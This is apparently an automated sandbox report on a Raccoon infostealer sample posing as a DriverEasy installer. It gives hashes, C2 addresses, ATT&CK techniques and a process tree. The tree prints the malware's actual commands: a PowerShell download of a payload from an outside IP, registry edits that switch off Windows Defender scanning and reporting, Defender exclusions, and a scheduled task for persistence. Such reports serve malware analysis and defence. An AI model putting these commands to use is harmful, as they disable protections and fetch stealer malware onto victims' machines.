raccoon | e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
27-09-2022 04:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exe
Size

6.0MB
MD5

e9acfc93e52dd181932e7604184beecb
SHA1

a5172b25d36f9954ae0c198f569432c4954a00b2
SHA256

e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12
SHA512

803e01f218c1e427a3585b30c260824ac8a7b8e687976619fbf61e2645ff1905cefd1004d3f54b9580ee8e90f4e8a23a28e616b933e433fcb120c5b97e3ac2d6
SSDEEP

196608:SkV6yZjVzDxw7ZX1J8ZG+HIf5XI+l5Qs0:RV5xzG7d/1XI+XQv

Score

10^/10

raccoon 9b19cf60d9bdf65b8a2495aa965456c3 evasion spyware stealer themida trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://80.92.205.35/hfile.bin

Extracted

Family

raccoon

Botnet

9b19cf60d9bdf65b8a2495aa965456c3

http://94.131.107.206

rc4.plain

Signatures

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

evasion trojan

Modify Existing Service

T1031

Modify Registry

T1112

Disabling Security Tools

T1089

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

56FGxFdp.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 56FGxFdp.exe
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

9 4928 powershell.exe
Downloads MZ/PE file

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	56FGxFdp.exe

flow	pid	process
9	4928	powershell.exe

Executes dropped EXE 21 IoCs

Processes:

e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmpDriverEasy.5.7.3.exeDriverEasy.5.7.3.tmp7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exelrPBx4qjVQLL.exegs0f84bl.exeNqrLZCvW.exe56FGxFdp.exeNqrLZCvW.exe

pid	process
1732	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
372	DriverEasy.5.7.3.exe
1476	DriverEasy.5.7.3.tmp
4504	7za.exe
1736	7za.exe
3312	7za.exe
3408	7za.exe
1456	7za.exe
3752	7za.exe
4912	7za.exe
2096	7za.exe
880	7za.exe
1480	7za.exe
908	7za.exe
2036	7za.exe
220	7za.exe
4916	lrPBx4qjVQLL.exe
2956	gs0f84bl.exe
712	NqrLZCvW.exe
1592	56FGxFdp.exe
4368	NqrLZCvW.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

56FGxFdp.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	56FGxFdp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	56FGxFdp.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exeWScript.exeNqrLZCvW.exee2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	NqrLZCvW.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp

Loads dropped DLL 8 IoCs

Processes:

e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmpDriverEasy.5.7.3.tmpInstallUtil.exe

pid	process
1732	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
1476	DriverEasy.5.7.3.tmp
1476	DriverEasy.5.7.3.tmp
1476	DriverEasy.5.7.3.tmp
1476	DriverEasy.5.7.3.tmp
4696	InstallUtil.exe
4696	InstallUtil.exe
4696	InstallUtil.exe

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\56FGxFdp.exe	themida
C:\Users\Admin\AppData\Local\Temp\56FGxFdp.exe	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

56FGxFdp.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 56FGxFdp.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	56FGxFdp.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

lrPBx4qjVQLL.exeNqrLZCvW.exe

description	pid	process	target process
PID 4916 set thread context of 4696	4916	lrPBx4qjVQLL.exe	InstallUtil.exe
PID 712 set thread context of 4368	712	NqrLZCvW.exe	NqrLZCvW.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1016 schtasks.exe
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings cmd.exe
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

4696 PING.EXE
2720 PING.EXE
4928 PING.EXE

pid	process
1016	schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings	cmd.exe

pid	process
4696	PING.EXE
2720	PING.EXE
4928	PING.EXE

Suspicious behavior: EnumeratesProcesses 34 IoCs

Processes:

e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmpDriverEasy.5.7.3.tmppowershell.exepowershell.exepowershell.exelrPBx4qjVQLL.exeNqrLZCvW.exegs0f84bl.exe

pid	process
1732	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
1732	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
1476	DriverEasy.5.7.3.tmp
1476	DriverEasy.5.7.3.tmp
4928	powershell.exe
4928	powershell.exe
1592	powershell.exe
1592	powershell.exe
4028	powershell.exe
4028	powershell.exe
4916	lrPBx4qjVQLL.exe
4916	lrPBx4qjVQLL.exe
4916	lrPBx4qjVQLL.exe
4916	lrPBx4qjVQLL.exe
4916	lrPBx4qjVQLL.exe
4916	lrPBx4qjVQLL.exe
4916	lrPBx4qjVQLL.exe
4916	lrPBx4qjVQLL.exe
4916	lrPBx4qjVQLL.exe
4916	lrPBx4qjVQLL.exe
712	NqrLZCvW.exe
712	NqrLZCvW.exe
712	NqrLZCvW.exe
712	NqrLZCvW.exe
2956	gs0f84bl.exe
2956	gs0f84bl.exe
2956	gs0f84bl.exe
2956	gs0f84bl.exe
2956	gs0f84bl.exe
2956	gs0f84bl.exe
2956	gs0f84bl.exe
2956	gs0f84bl.exe
2956	gs0f84bl.exe
2956	gs0f84bl.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exeNqrLZCvW.exe

description	pid	process
Token: SeDebugPrivilege	4928	powershell.exe
Token: SeDebugPrivilege	1592	powershell.exe
Token: SeDebugPrivilege	4028	powershell.exe
Token: SeDebugPrivilege	712	NqrLZCvW.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp

pid process

1732 e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exee2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmpDriverEasy.5.7.3.execmd.exeWScript.execmd.exe

description	pid	process	target process
PID 2488 wrote to memory of 1732	2488	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exe	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
PID 2488 wrote to memory of 1732	2488	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exe	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
PID 2488 wrote to memory of 1732	2488	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exe	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
PID 1732 wrote to memory of 372	1732	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp	DriverEasy.5.7.3.exe
PID 1732 wrote to memory of 372	1732	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp	DriverEasy.5.7.3.exe
PID 1732 wrote to memory of 372	1732	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp	DriverEasy.5.7.3.exe
PID 372 wrote to memory of 1476	372	DriverEasy.5.7.3.exe	DriverEasy.5.7.3.tmp
PID 372 wrote to memory of 1476	372	DriverEasy.5.7.3.exe	DriverEasy.5.7.3.tmp
PID 372 wrote to memory of 1476	372	DriverEasy.5.7.3.exe	DriverEasy.5.7.3.tmp
PID 1732 wrote to memory of 3984	1732	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp	cmd.exe
PID 1732 wrote to memory of 3984	1732	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp	cmd.exe
PID 1732 wrote to memory of 3984	1732	e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp	cmd.exe
PID 3984 wrote to memory of 4928	3984	cmd.exe	powershell.exe
PID 3984 wrote to memory of 4928	3984	cmd.exe	powershell.exe
PID 3984 wrote to memory of 4928	3984	cmd.exe	powershell.exe
PID 3984 wrote to memory of 4504	3984	cmd.exe	7za.exe
PID 3984 wrote to memory of 4504	3984	cmd.exe	7za.exe
PID 3984 wrote to memory of 4504	3984	cmd.exe	7za.exe
PID 3984 wrote to memory of 4696	3984	cmd.exe	PING.EXE
PID 3984 wrote to memory of 4696	3984	cmd.exe	PING.EXE
PID 3984 wrote to memory of 4696	3984	cmd.exe	PING.EXE
PID 3984 wrote to memory of 2240	3984	cmd.exe	WScript.exe
PID 3984 wrote to memory of 2240	3984	cmd.exe	WScript.exe
PID 3984 wrote to memory of 2240	3984	cmd.exe	WScript.exe
PID 2240 wrote to memory of 3748	2240	WScript.exe	cmd.exe
PID 2240 wrote to memory of 3748	2240	WScript.exe	cmd.exe
PID 2240 wrote to memory of 3748	2240	WScript.exe	cmd.exe
PID 3748 wrote to memory of 2460	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 2460	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 2460	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 2440	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 2440	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 2440	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 1508	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 1508	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 1508	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 4260	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 4260	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 4260	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 1160	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 1160	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 1160	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 712	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 712	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 712	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 1692	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 1692	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 1692	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 4800	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 4800	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 4800	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 840	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 840	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 840	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 3096	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 3096	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 3096	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 2908	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 2908	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 2908	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 1528	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 1528	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 1528	3748	cmd.exe	reg.exe
PID 3748 wrote to memory of 5016	3748	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exe
"C:\Users\Admin\AppData\Local\Temp\e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2488

C:\Users\Admin\AppData\Local\Temp\is-P0NBS.tmp\e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P0NBS.tmp\e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.tmp" /SL5="$701F2,5385413,969216,C:\Users\Admin\AppData\Local\Temp\e2b9859fcfaed0a7d7a857646cf37b042df26f13a4c455a5fcffed0f6bb74d12.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1732

C:\Users\Admin\AppData\Local\Temp\is-UP9TI.tmp\DriverEasy.5.7.3.exe
"C:\Users\Admin\AppData\Local\Temp\is-UP9TI.tmp\DriverEasy.5.7.3.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:372

C:\Users\Admin\AppData\Local\Temp\is-7C6M9.tmp\DriverEasy.5.7.3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7C6M9.tmp\DriverEasy.5.7.3.tmp" /SL5="$301DC,3761185,330752,C:\Users\Admin\AppData\Local\Temp\is-UP9TI.tmp\DriverEasy.5.7.3.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\SurfaceReduction\main.bat" "
3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy bypass -noprofile -command "(New-Object System.Net.WebClient).DownloadFile('http://80.92.205.35/hfile.bin', 'hfile.bin')";
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4928

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe x -y -p10619mlgrAGP7211mlgrAGP24753 "*.zip"
4⤵
- Executes dropped EXE
PID:4504

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 10
4⤵
- Runs ping.exe
PID:4696

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\SurfaceReduction\ControlSet003.vbs"
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\SurfaceReduction\ControlSet001_obf.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:3748

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
6⤵
PID:2460

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
6⤵
PID:2440

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
6⤵
PID:1508

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
6⤵
PID:4260

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
6⤵
PID:1160

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
6⤵
PID:712

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
6⤵
PID:1692

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
6⤵
PID:4800

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
6⤵
PID:840

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
6⤵
PID:3096

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
6⤵
PID:2908

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
6⤵
PID:1528

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
6⤵
PID:5016

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
6⤵
PID:3120

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
6⤵
PID:3920

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
6⤵
PID:1892

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
6⤵
PID:4748

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 1 /f
6⤵
PID:392

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
6⤵
PID:3012

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender notification settings
PID:3884

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SurfaceReduction"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1592

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionExtension ".exe"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\SurfaceReduction\compil32_obf.bat" "
5⤵
PID:624

C:\Windows\SysWOW64\mode.com
mode 65,10
6⤵
PID:4836

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e file.zip -p9178UTuitA24715UTuitA26909 -oextracted
6⤵
- Executes dropped EXE
PID:1736

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_11.zip -oextracted
6⤵
- Executes dropped EXE
PID:3312

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_10.zip -oextracted
6⤵
- Executes dropped EXE
PID:3408

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_9.zip -oextracted
6⤵
- Executes dropped EXE
PID:1456

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_8.zip -oextracted
6⤵
- Executes dropped EXE
PID:3752

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_7.zip -oextracted
6⤵
- Executes dropped EXE
PID:4912

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_6.zip -oextracted
6⤵
- Executes dropped EXE
PID:2096

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_5.zip -oextracted
6⤵
- Executes dropped EXE
PID:880

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_4.zip -oextracted
6⤵
- Executes dropped EXE
PID:1480

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_3.zip -oextracted
6⤵
- Executes dropped EXE
PID:908

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_2.zip -oextracted
6⤵
- Executes dropped EXE
PID:2036

C:\ProgramData\SurfaceReduction\7za.exe
7za.exe e extracted/file_1.zip -oextracted
6⤵
- Executes dropped EXE
PID:220

C:\ProgramData\SurfaceReduction\lrPBx4qjVQLL.exe
"lrPBx4qjVQLL.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4916

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
7⤵
PID:4752

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
7⤵
PID:1428

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
7⤵
- Loads dropped DLL
PID:4696

C:\Users\Admin\AppData\Roaming\gs0f84bl.exe
"C:\Users\Admin\AppData\Roaming\gs0f84bl.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2956

C:\Users\Admin\AppData\Roaming\NqrLZCvW.exe
"C:\Users\Admin\AppData\Roaming\NqrLZCvW.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:712

C:\Users\Admin\AppData\Roaming\NqrLZCvW.exe
"C:\Users\Admin\AppData\Roaming\NqrLZCvW.exe"
9⤵
- Executes dropped EXE
- Checks computer location settings
PID:4368

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
10⤵
- Creates scheduled task(s)
PID:1016

C:\Users\Admin\AppData\Local\Temp\56FGxFdp.exe
"C:\Users\Admin\AppData\Local\Temp\56FGxFdp.exe"
8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:1592

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\SurfaceReduction\ControlSet002.bat" "
5⤵
PID:1724

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 5
6⤵
- Runs ping.exe
PID:2720

C:\Windows\SysWOW64\cmd.exe
cmd /c rd /q /s "C:\ProgramData\SurfaceReduction\"
6⤵
PID:3660

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
4⤵
- Runs ping.exe
PID:4928

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\SurfaceReduction\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

